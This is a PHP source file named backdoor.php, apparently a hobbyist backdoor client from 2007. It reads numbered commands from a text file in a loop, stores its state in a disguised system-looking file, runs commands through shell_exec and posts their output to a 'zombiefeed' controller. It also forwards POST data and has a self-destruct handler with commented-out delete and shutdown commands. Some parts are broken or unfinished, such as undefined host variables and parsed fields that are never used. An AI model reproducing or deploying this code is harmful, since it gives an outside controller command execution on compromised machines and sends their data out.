php/skripty/backdoor.php

   1 <?php
   2 //////////////////////////////////////////////////////////////////
   3 //©opylefted by <-Harvie 2oo7
   4 ////////////////////////SETTINGS//////////////////////////////////
   5
   6 $file = "backdoor.txt"; //Interface to comunicate with BackD00R
   7 $lastf = "c:\\sysc.sys"; //Place to save last settings
   8 $feed = "http://localhost:8080/PHP/zombiefeed.php?feed=";
   9
  10 //Init (will be used, if no settings was saved):
  11 $last = 0;
  12 $interval = 30;
  13 //////////////////////////////////////////////////////////////////
  14
  15 function post($host, $path, $data) {
  16   $http_response = "";
  17   $content_length = strlen($data);
  18   $fp = fsockopen($host, 8080);
  19   fputs($fp, "POST $path HTTP/1.1\r\n");
  20   fputs($fp, "Host: $host\r\n");
  21   fputs($fp, "Content-Type: application/x-www-form-urlencoded\r\n");
  22   fputs($fp, "Content-Length: $content_length\r\n");
  23   fputs($fp, "Connection: close\r\n\r\n");
  24   fputs($fp, $data);
  25   while (!feof($fp)) $http_response .= fgets($fp, 28);
  26   fclose($fp);
  27   echo("Posted\n");
  28   return $http_response;
  29 }
  30
  31 $postdata = "?feed=bar";
  32 foreach($_POST as $key => $val) $postdata .= '&'.$key.'='.$val;
  33
  34 $http_response = post('localhost', '/PHP/zombiefeed.php', $postdata);
  35
  36 /////////////////////////////////////////////////////
  37
  38 function shellf($command) {
  39   $shellout = shell_exec($command);
  40   post($feedhost, $feedpath, $shellout);
  41   echo ($shellout); //Debug
  42   }
  43
  44 function autodestruct() {
  45   echo("KILLED BY MY MASTER !!!\n\n");
  46   //System("del this1234567889.exe");
  47   //System("shutdown -s");
  48 }
  49
  50 //////////////////////////////////////////////////////////////////
  51
  52 //Debug:
  53 //readfile("http://harvie.stokoruna.cz/");
  54 //shellf("dir");
  55
  56 //GET SAVED SETTINGS:
  57 if ( $fp = fopen($lastf, "r") ) { //Check if settings file exists
  58     $temp = fgets($fp);
  59     fclose($fp); //Close settings file
  60     //Parse saved settings:
  61     $temp = explode( " ", trim($temp) );
  62     $last = $temp[0];
  63     $interval = $temp[1];
  64     //echo($fp); //Debug
  65   }
  66
  67 /*
  68 echo("last: $last\n"); //Debug
  69 echo("interval: $interval\n"); //Debug
  70 */
  71
  72 while(1) { //Listen on interface
  73   $in = file($file); //Read commands from interface
  74   if( $last < trim($in[0]) ) { //Command number check
  75
  76     //Parse commands from interface to variables:
  77     $last = trim($in[0]);
  78     $interval = trim($in[1]);
  79     $command = trim($in[2]);
  80     $download = trim($in[3]);
  81     $downloadto = trim($in[4]);
  82
  83     //Save settings:
  84     $fp = fopen($lastf, "w+");
  85     fwrite($fp, ("$last $interval") );
  86     fclose($fp);
  87
  88 ///////WORK WITH RECIEVED COMMANDS////////////////////////////////
  89
  90     if ($command == "_autodestruct")
  91      { autodestruct(); }
  92
  93     echo("last: $last\n");
  94     echo("interval: $interval\n");
  95     echo("command: $command\n");
  96     echo("Download what: $download\n");
  97     echo("Download where: $downloadto\n");
  98
  99     echo("-------------------------------------------------------------------------\n");
 100
 101 ///////REPLY TO SERVER////////////////////////////////////////////
 102
 103     //readfile($reply);
 104
 105 //////////////////////////////////////////////////////////////////
 106
 107   }
 108   sleep($interval); //Pause
 109 }
 110
 111 ?>